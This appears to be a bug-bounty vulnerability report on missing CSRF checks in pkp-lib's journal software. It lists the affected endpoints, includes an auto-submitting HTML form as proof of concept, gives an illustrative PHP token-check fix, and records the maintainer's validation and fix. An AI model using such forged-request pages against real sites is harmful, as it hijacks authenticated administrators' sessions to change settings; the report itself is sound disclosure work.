Cross-Site Request Forgery (CSRF) in pkp/pkp-lib

Valid

Reported on Oct 5th 2021


Description

Missing CSRF token validation in role stage assignment (assign/unassign), language-setting saves, the admin cache-clearing actions, and the task-notification grid actions (mark read, mark new, delete). Each of the following endpoints changes state without requiring a CSRF token:

1: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage?stageId=1&userGroupId=5

2: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/user-group-grid/assign-stage?stageId=1&userGroupId=5

3: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/languages/manage-language-grid/save-language-setting?rowId=en_US&setting=supportedLocales&value=

4: http://10.0.2.15/index.php/index/admin/clearDataCache

5: http://10.0.2.15/index.php/index/admin/clearTemplateCache

6: http://10.0.2.15/index.php/index/admin/clearScheduledTaskLogFiles

7: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/mark-read?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

8: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/mark-new?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

9: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/delete?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

Proof of Concept

Example: Unassign stage

Open the index.html:

<html>
  <body>
    <!-- The form targets the unassign-stage endpoint; the parameters ride in the query string -->
    <form action="http://[OJS-IP+PORT]/ojs/index.php/[JOURNAL_NAME]/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage?stageId=1&userGroupId=5" method="POST">
    </form>
    <script>
      // Submit automatically when a logged-in user loads the page
      document.forms[0].submit();
    </script>
  </body>
</html>
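The proof of concept works because the handler acts on any request that carries the victim's session cookie. The usual fix is a synchronizer token: a per-session secret that the server embeds in its own forms and requires on every state-changing request, which a cross-origin page cannot read. The following PHP is an added example written for this report; it is not pkp-lib's code, and the handler names, the `csrfToken` parameter name, and the use of plain PHP sessions are assumptions for illustration.

```php
<?php
// Added example (not pkp-lib code): a minimal synchronizer-token CSRF check
// for a state-changing handler shaped like the unassign-stage action above.
// Assumes PHP sessions; handler and parameter names are illustrative.

declare(strict_types=1);

session_start();

// Issue (or reuse) a per-session secret. A cross-origin attacker page cannot read it.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session's token in constant time.
function csrfValid(array $request): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given = $request['csrfToken'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Vulnerable shape: the change happens as soon as a valid session exists.
// This is what lets the auto-submitting form above succeed.
function unassignStageVulnerable(array $request): string
{
    // (authorisation check only; no token check)
    return "stage {$request['stageId']} unassigned from group {$request['userGroupId']}";
}

// Hardened shape: require POST and a matching token before changing state.
function unassignStageHardened(string $method, array $request): string
{
    if ($method !== 'POST') {
        http_response_code(405);
        return 'method not allowed';
    }
    if (!csrfValid($request)) {
        http_response_code(403);
        return 'csrf token missing or invalid';
    }
    return "stage {$request['stageId']} unassigned from group {$request['userGroupId']}";
}

// The legitimate form embeds the token, so only same-origin pages can carry it.
function renderForm(string $action): string
{
    $token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    return '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '" method="POST">'
        . '<input type="hidden" name="csrfToken" value="' . $token . '">'
        . '<button>Unassign</button></form>';
}

// Constructed demonstration: a forged request without a token is refused,
// a request carrying the session's token is processed.
$forged = ['stageId' => '1', 'userGroupId' => '5'];
$legit  = $forged + ['csrfToken' => csrfToken()];
echo unassignStageHardened('POST', $forged), PHP_EOL;
echo unassignStageHardened('POST', $legit), PHP_EOL;
echo renderForm('/index.php/journal/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage'), PHP_EOL;
```

Two design points: the comparison uses `hash_equals` rather than `==` so the check does not leak the token through timing, and the token lives in the server-side session rather than in a cookie alone, because a cookie is exactly what the browser already attaches to the forged request. Marking the session cookie `SameSite=Lax` or `Strict` is worthwhile defence in depth, but it does not replace the token check for endpoints like those listed above.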

Impact

This vulnerability allows an attacker who lures an authenticated journal manager or site administrator to a crafted page to change user role stage assignments and language settings on that user's behalf. The same missing check applies to the cache-clearing and task-notification endpoints listed above.

Occurrences

Missing CSRF validation for language settings

Missing CSRF validation for clear scheduled task

Missing CSRF validation in mark read

Missing CSRF tokens for the 3 admin control actions

Missing CSRF token in assign / unassign stage form

Missing CSRF validation for clear data cache

Missing CSRF validation in mark new

Missing CSRF validation in delete

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
haxatron modified the report a year ago

haxatron (Researcher), a year ago:

Hi @admin, maintainers have updated SECURITY.md at https://github.com/pkp/ojs/blob/main/SECURITY.md

Jamie Slome (Admin), a year ago:

I have left a comment on the GitHub Issue.

Alec Smecher validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher (Maintainer), a year ago:

I have filed this at https://github.com/pkp/pkp-lib/issues/7371 and will work on a fix. I'm not familiar with this website's model and left the bounty amount selection at its default.

haxatron (Researcher), a year ago:

Thanks for validating this report!

Alec Smecher marked this as fixed with commit 62c07e a year ago
Alec Smecher has been awarded the fix bounty
This vulnerability will not receive a CVE
userGroupForm.tpl#L11-L65 has been validated
index.tpl#L35-L37 has been validated